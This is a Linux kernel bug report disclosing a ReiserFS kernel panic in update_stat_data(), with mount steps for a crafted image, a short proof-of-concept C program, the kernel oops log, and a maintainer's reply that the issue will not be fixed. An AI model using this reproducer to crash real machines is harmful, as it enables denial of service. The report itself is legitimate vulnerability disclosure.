200361 – Kernel panic in update_stat_data() when accessing a file on a reiserfs filesystem

Bug 200361 - Kernel panic in update_stat_data() when accessing a file on a reiserfs filesystem

Summary: Kernel panic in update_stat_data() when accessing a file on a reiserfs filesy...

Status:	NEW

Alias:	None

Product:	File System
Classification:	Unclassified
Component:	ReiserFS (show other bugs)
Hardware:	All Linux

Importance:	P1 normal
Assignee:	ReiseFS developers team

URL:
Keywords:

Depends on:
Blocks:

Reported:	2018-06-28 21:06 UTC by Wen Xu
Modified:	2018-07-18 21:17 UTC (History)
CC List:	2 users (show)

See Also:
Kernel Version:	4.18
Subsystem:
Regression:	No
Bisected commit-id:

Attachments
The (compressed) crafted image which causes crash (67.50 KB, application/zip) 2018-06-28 21:06 UTC, Wen Xu	Details
Add an attachment (proposed patch, testcase, etc.)

Description Wen Xu 2018-06-28 21:06:08 UTC

Created attachment 277015 [details]
The (compressed) crafted image which causes crash

- Reproduce 
# mkdir mnt
# mount -t reiserfs -o acl,user_xattr 31.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
    #define _GNU_SOURCE
    #include <sys/types.h>
    #include <sys/mount.h>
    #include <sys/mman.h>
    #include <sys/stat.h>
    #include <sys/xattr.h>

    #include <dirent.h>
    #include <errno.h>
    #include <error.h>
    #include <fcntl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    #include <linux/falloc.h>
    #include <linux/loop.h>

  
    static void activity(char *mpoint) {

      char *foo_bar_baz;
      int err;

      static int buf[8192];
      memset(buf, 0, sizeof(buf));

      err = asprintf(&foo_bar_baz, "%s/foo/bar/baz", mpoint);

      int fd = open(foo_bar_baz, O_RDONLY, 0);
      if (fd >= 0) {
        void *mem = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE | MAP_POPULATE, fd, 0);

        if (mem != MAP_FAILED)
          munmap(mem, 4096);

        close(fd);
      }
      
    }

    int main(int argc, char *argv[]) {
      activity(argv[1]);
      return 0;
    }

- Kernel message
[  949.720812] REISERFS (device loop0): found reiserfs format "3.6" with standard journal
[  949.720899] REISERFS (device loop0): using ordered data mode
[  949.720905] reiserfs: using flush barriers
[  949.724305] REISERFS (device loop0): journal params: device loop0, size 8192, journal first block 18, max trans len 1024, max batch 900, max commit age 30, max trans age 30
[  949.727088] REISERFS (device loop0): checking transaction log (loop0)
[  950.557910] REISERFS (device loop0): Using r5 hash to sort names
[  950.558231] REISERFS (device loop0): Created .reiserfs_priv - reserved for xattr storage.
[  967.052214] REISERFS panic (device loop0): vs-13065 update_stat_data: key [5 15 0x0 SD], found item *3.5*[5 15 0x0 IND], item_len 8, item_location 2972, free_space(entry_count) 0
[  967.052279] ------------[ cut here ]------------
[  967.052282] kernel BUG at fs/reiserfs/prints.c:369!
[  967.059616] invalid opcode: 0000 [#1] SMP KASAN PTI
[  967.060669] CPU: 0 PID: 1429 Comm: a.out Not tainted 4.18.0-rc1+ #8
[  967.061944] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  967.063902] RIP: 0010:__reiserfs_panic+0xe2/0x130
[  967.064864] Code: 48 89 da 48 c7 c1 20 11 94 a6 74 47 49 8d b4 24 d8 03 00 00 49 c7 c1 e0 21 9a a7 4d 89 e8 48 c7 c7 c0 12 94 a6 e8 62 a4 c7 ff <0f> 0b 48 85 db 48 89 de 48 c7 c2 20 11 94 a6 74 24 49 c7 c0 e0 21
[  967.068599] RSP: 0018:ffff8801efa77760 EFLAGS: 00010282
[  967.069671] RAX: 00000000000000a6 RBX: ffffffffa693af60 RCX: 0000000000000000
[  967.071092] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003df4eee2
[  967.072513] RBP: ffff8801efa77810 R08: ffffed003edc4f21 R09: ffffed003edc4f21
[  967.073948] R10: 0000000000000001 R11: ffffed003edc4f20 R12: ffff8801ee98e600
[  967.075367] R13: ffffffffa693b980 R14: ffff8801cd360000 R15: ffff8801cd3601c8
[  967.076797] FS:  00007f88c4a10700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  967.078394] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  967.079537] CR2: 00007f88c44c1760 CR3: 00000001f136c000 CR4: 00000000000006f0
[  967.080980] Call Trace:
[  967.081504]  ? reiserfs_debug+0x10/0x10
[  967.082289]  reiserfs_update_sd_size+0x44f/0x590
[  967.083227]  ? make_le_item_head+0x130/0x130
[  967.084133]  ? mutex_unlock+0x22/0x40
[  967.084903]  ? do_journal_begin_r+0x46c/0x6d0
[  967.085789]  ? journal_begin+0x10f/0x1e0
[  967.086585]  reiserfs_dirty_inode+0x149/0x160
[  967.087465]  ? reiserfs_dirty_inode+0x149/0x160
[  967.088383]  ? reiserfs_unfreeze+0x70/0x70
[  967.089254]  ? timespec64_trunc+0x5c/0x90
[  967.090072]  ? timespec64_trunc+0x5c/0x90
[  967.090902]  __mark_inode_dirty+0x220/0x4f0
[  967.091754]  ? timespec64_trunc+0x90/0x90
[  967.092571]  generic_update_time+0xd7/0x170
[  967.093435]  touch_atime+0x164/0x190
[  967.094169]  ? __atime_needs_update+0x360/0x360
[  967.095101]  ? kasan_kmalloc+0xad/0xe0
[  967.095891]  generic_file_mmap+0x80/0x90
[  967.096702]  mmap_region+0x5dc/0x8d0
[  967.097449]  do_mmap+0x543/0x790
[  967.098126]  vm_mmap_pgoff+0x182/0x1f0
[  967.098896]  ? vma_is_stack_for_current+0x60/0x60
[  967.099852]  ? putname+0x80/0x90
[  967.100518]  ? __fget+0xbe/0x110
[  967.101202]  ksys_mmap_pgoff+0x2a9/0x3a0
[  967.102011]  ? find_mergeable_anon_vma+0x60/0x60
[  967.102964]  ? filp_open+0x60/0x60
[  967.103666]  ? vm_brk+0x20/0x20
[  967.104338]  __x64_sys_mmap+0x94/0xb0
[  967.105115]  do_syscall_64+0x78/0x170
[  967.105868]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  967.106903] RIP: 0033:0x7f88c452c6ba
[  967.107631] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00
[  967.111428] RSP: 002b:00007ffdc414efb8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[  967.112949] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f88c452c6ba
[  967.114365] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[  967.115783] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
[  967.117209] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[  967.118626] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000
[  967.120051] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper crct10dif_pclmul syscopyarea sysfillrect sysimgblt fb_sys_fops ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[  967.129773] ---[ end trace 2e85051acb5f6dc1 ]---
[  967.130773] RIP: 0010:__reiserfs_panic+0xe2/0x130
[  967.131719] Code: 48 89 da 48 c7 c1 20 11 94 a6 74 47 49 8d b4 24 d8 03 00 00 49 c7 c1 e0 21 9a a7 4d 89 e8 48 c7 c7 c0 12 94 a6 e8 62 a4 c7 ff <0f> 0b 48 85 db 48 89 de 48 c7 c2 20 11 94 a6 74 24 49 c7 c0 e0 21
[  967.135581] RSP: 0018:ffff8801efa77760 EFLAGS: 00010282
[  967.136638] RAX: 00000000000000a6 RBX: ffffffffa693af60 RCX: 0000000000000000
[  967.138147] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003df4eee2
[  967.139572] RBP: ffff8801efa77810 R08: ffffed003edc4f21 R09: ffffed003edc4f21
[  967.140988] R10: 0000000000000001 R11: ffffed003edc4f20 R12: ffff8801ee98e600
[  967.142435] R13: ffffffffa693b980 R14: ffff8801cd360000 R15: ffff8801cd3601c8
[  967.143851] FS:  00007f88c4a10700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  967.145453] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  967.146642] CR2: 00007f88c44c1760 CR3: 00000001f136c000 CR4: 00000000000006f0

- Location
https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/reiserfs/inode.c#L1434
	if (!is_statdata_le_ih(ih))
		reiserfs_panic(inode->i_sb, "vs-13065", "key %k, found item %h",
			       INODE_PKEY(inode), ih);

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.

Comment 1 Jeff Mahoney 2018-07-18 21:17:20 UTC

This is a panic due to reiserfs not having real error handling.  As reiserfs is in maintenance mode, this class is not on anyone's roadmap for fixing.

Note You need to log in before you can comment on or make changes to this bug.